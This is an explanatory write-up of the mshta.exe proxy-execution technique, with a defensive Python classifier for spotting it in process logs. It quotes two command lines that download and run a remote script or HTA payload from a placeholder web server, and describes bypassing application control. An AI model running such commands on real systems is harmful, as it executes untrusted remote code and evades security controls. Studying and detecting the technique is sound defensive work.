MSHTA

Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and JavaScript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code.

Mshta.exe is a utility that executes Microsoft HTML Application (HTA) files. HTAs are standalone applications that execute using the same models and technologies as Internet Explorer, but outside of the browser.

Files may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")"))

They may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta

Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of Internet Explorer's security context, it also bypasses browser security settings.
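
For defenders, the two invocation styles above can be told apart in process-creation logs. The following is an added example, not code from the original page: a small Python classifier for mshta command lines. The function names, finding labels and the sample command lines are assumptions made for illustration.

```python
import re

# Script protocol handlers the page names (VBScript, JavaScript) and URL arguments.
INLINE_SCRIPT = re.compile(r"\b(?:vbscript|javascript)\s*:", re.IGNORECASE)
REMOTE_URL = re.compile(r"\bhttps?://", re.IGNORECASE)
# Split a process command line into image (quoted or unquoted) and arguments.
CMDLINE = re.compile(r'^\s*(?:"(?P<q>[^"]+)"|(?P<u>\S+))\s*(?P<args>.*)$', re.DOTALL)


def classify_mshta(cmdline):
    """Return a list of findings for an mshta command line, or None if the
    process image is not mshta. Matching is by file name only, so a renamed
    copy of mshta.exe is not covered by this check."""
    m = CMDLINE.match(cmdline)
    if not m:
        return None
    image = (m.group("q") or m.group("u")).lower()
    if re.split(r"[\\/]", image)[-1] not in ("mshta", "mshta.exe"):
        return None
    args = m.group("args")
    findings = []
    if INLINE_SCRIPT.search(args):
        findings.append("inline_script")
    if REMOTE_URL.search(args):
        findings.append("remote_url")
    if not findings and ".hta" in args.lower():
        findings.append("local_hta")
    return findings


# Constructed sample command lines; the first two mirror the page's examples.
SAMPLES = [
    'mshta vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")"))',
    '"C:\\Windows\\System32\\mshta.exe" http://webserver/payload.hta',
    'C:\\Windows\\System32\\mshta.exe C:\\Users\\Public\\app.hta',
    'notepad.exe C:\\temp\\mshta.txt',
]


def scan(cmdlines):
    """Return (cmdline, findings) pairs for mshta runs that warrant review."""
    hits = []
    for line in cmdlines:
        findings = classify_mshta(line)
        if findings and findings != ["local_hta"]:
            hits.append((line, findings))
    return hits


if __name__ == "__main__":
    for line, findings in scan(SAMPLES):
        print(",".join(findings), "<-", line)
```

The command-line strings would normally come from process-creation telemetry; here they are embedded so the example runs offline.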

Example

I wrote a simple Python script that creates easy HTA applications which execute a simple PowerShell command; this one was slightly edited to execute calc.exe.

The following demo shows the execution, with Process Explorer running to show the flow of execution; the result is calc.exe opening.

Demo-HTA:
